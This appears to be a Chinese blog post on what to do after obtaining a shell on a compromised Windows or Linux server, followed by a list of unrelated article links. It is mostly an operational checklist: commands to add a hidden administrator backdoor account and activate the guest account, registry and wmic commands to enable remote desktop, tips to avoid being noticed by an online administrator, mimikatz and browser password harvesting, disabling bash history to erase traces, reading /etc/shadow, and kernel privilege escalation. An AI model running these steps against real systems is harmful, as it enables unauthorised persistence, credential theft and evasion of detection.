获取Shell后的操作
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。
Windows
当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?
第一步,先 whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法提权了。提权之后,利用mimikatz获取用户密码。如果是域环境的话,还可以获取登录过该主机的域用户密码。传送门——> 使用 mimikatz 破解windows登录密码
或者我们可以反弹一个MSF类型的shell到kali中,传送门——> 反弹MSF类型的Shell , MSF之后渗透阶段
以下命令是在Windows主机渗透测试过程中可以用到的
#信息探测
ipconfig #查看ip等信息
systeminfo #查看系统信息
netstat -ano #查看端口开放信息
tasklist /svc #查看进程信息
net user #查看主机用户
net localgroup #查看主机组
net share #查看开放的共享
net view #查看内网主机信息
#添加用户后门
net user hack 123 /add #添加用户并设置密码
net localgroup administrators hack /add #将用户加入管理组
net user guest /active:yes #激活guest用户
net user guest mstlab #更改guest用户的密码
更多Windows CMD窗口的命令,传送门——> Windows常见的cmd命令
如果对方主机没开3389端口怎么办?以下命令可以开启远程桌面服务,前提是管理员权限。
1.通用开3389(优化后):
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2.For Win2003:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.For Win2008:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4.For Every:
win08,三条命令即可,win2012通用;win7前两条即可。权限需要administrator。
wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
创建了后门用户,开启了远程桌面,我们就可以远程连接了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。开启远程桌面前慎重,慎重再慎重。
远程桌面登录后,我们查看桌面上有哪些软件,我们要找的目标有以下。
- FTP相关的软件
- 数据库相关的软件
- 打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码
总结:获得了权限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。为接下来的内网渗透弱口令爆破做准备。
Linux
在获得了Linux主机的权限后。第一步,我们要做的就是让我们接下来操作的所有命令不在主机上留下任何痕迹。我们可以执行下面的命令,这样我们接下来执行的所有命令都不会在 .bash_history中看到了。这条命令只对当前终端有效!
export HISTFILE=/dev/null export HISTSIZE=0
先查看当前用户身份,是否是root权限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞提权的,比如 CVE-2016-5195 。Linux下用SUID提权
然后要做的自然就是维持权限了,传送门——> Linux获取权限
whoami #查看当前用户身份
uname -a #查看系统信息
history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
last #查看登录历史
cat /etc/passwd #查看用户
cat /etc/shadow #查看密码
未完待更新。。
相关文章:Linux 主机超全渗透测试命令汇总
最新文章
- 【知识必备】ezSQL,最好用的数据库操作类,让php操作sql更简单~
- swift 学习笔记
- 2016huasacm暑假集训训练五 F - Monkey Banana Problem
- How to take partial screenshot with Selenium WebDriver in python
- 重新想象 Windows 8 Store Apps (48) - 多线程之其他辅助类: SpinWait, SpinLock, Volatile, SynchronizationContext, CoreDispatcher, ThreadLocal, ThreadStaticAttribute
- Maven2的配置文件settings.xml(转)
- 18个jQuery Mobile开发贴士和教程
- WPF 多线程处理(2)
- (从终端看linux-2)浅析terminal创建时ptmx和pts关系
- Android SQLite API的使用(非原创)
- yii学习笔记--快速创建一个项目
- IIS 程序池与Site 导出、导入
- 记一次php脚本memory exhausted
- 20165304《JAVA程序设计》第四周学习总结
- Unity GPU Instancing的使用尝试
- CAS (14) —— CAS 更多用户信息
- Java并发编程--1.Thread和Runnable
- [转载]Require.js Example – Setup Time 2 Minutes
- mongodb安装及副本集搭建
- 回车替换Tab 并不会 提交表单 IE Chrome 通过
热门文章
- 200-Java语言基础-Java编程入门-005 | Java方法定义及使用
- 【python+selenium的web自动化】- 元素的常用操作详解(一)
- vue 树形数据增加属性并计算树节点的深度
- 2017算法期末复习练习赛-G Beihang Couple Pairing Comunity 2017 题解(网络流)
- BZOJ_2844 albus就是要第一个出场 【线性基】
- python-链队列的实现
- 想了很久,一道Microsoft的笔试题目 —— Reversing Linked List
- 归并排序(JAVA语言)
- P1177【模板】快速排序(JAVA语言)
- Redis 6.1 redis-cluster-proxy 实践说明